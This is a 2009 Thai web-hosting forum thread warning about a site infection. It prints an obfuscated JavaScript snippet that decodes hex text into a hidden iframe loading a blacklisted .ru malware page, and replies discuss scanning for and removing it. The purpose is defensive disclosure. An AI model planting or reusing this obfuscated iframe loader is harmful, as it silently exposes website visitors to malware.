IFrame version ใหม่ (มั้ง)

muuict · September 1, 2009, 10:28am

<script>document.write(‘<span id=“TcY”
style=“display:none”>
.3c.69.66.72.61.6d.65.20.73.72.63.3d.27.68.74.74.70.3a.2f.2f.74.72.61.6d.61.64
.6f.6c.73.70.61.63.65.2e.72.75.2f.73.79.6d.70.6c.65.2e.68.74.6d.6c.27.20.73.74.79.6c.65.3d.27.64.69.73.70.6c.61.79.3a.6e.6f.6e.65.3b.27.3e.3c.2f.69.66.72.61.6d.65.3e
</span>’);
var TcY, dAc, EsR = unescape;
TcY = document.getElementById(“TcY”);
TcY = TcY.innerHTML;dAc = TcY.replace(/[+.]/g, “%”);
dAc = EsR(dAc);document.write(dAc);
</script>

มีใครเจอยังครับ กูเกิลยังไม่ฟ้องเลยครับตอนนี้ ซึ่งผมถอดรหัสแล้วมันก็ลิ้งไป

http://tramadolspace.ru/symple.html
เซิชแล้ว มันติดอยู่ในmalware url blacklist

pizzaman911 · September 1, 2009, 12:40pm

ขอบคุณครับ

sailomsaengdaed · September 1, 2009, 1:09pm

ขอบคุณครับ

SiamLiveHost.com · September 1, 2009, 1:13pm

ขอบคุณที่นำมาแจ้งกันครับ

thaidhost · September 1, 2009, 1:15pm

ลักษณะการติด น่าจะเหมือนเดิมนะครับ

mean · September 1, 2009, 1:26pm

Scan ด้วย key script ครับ
แล้ว replace มือ เอา ใช้ fizscript
ว่าจะทำเวอร์ชั่น login ก่อน และก็ chmod ได้แล้วๆๆๆ replace อีกรอบ ยังไม่ได้ทำเลยครับ เห่อ…

muuict · September 1, 2009, 1:40pm

เมื่อกี้ผมได้ลองวิเคราะห์ดูแล้ว มันก็ไม่ต่างจากตัวเดิมครับ เพียงแต่ว่า ใช้คำสั่งinnerHTMLแปลงข้อความที่เข้ารหัสhexaไว้เพื่อที่จะหลบเลี่ยงการตรวจจับจากgoogleอะครับ

system · May 16, 2016, 7:43am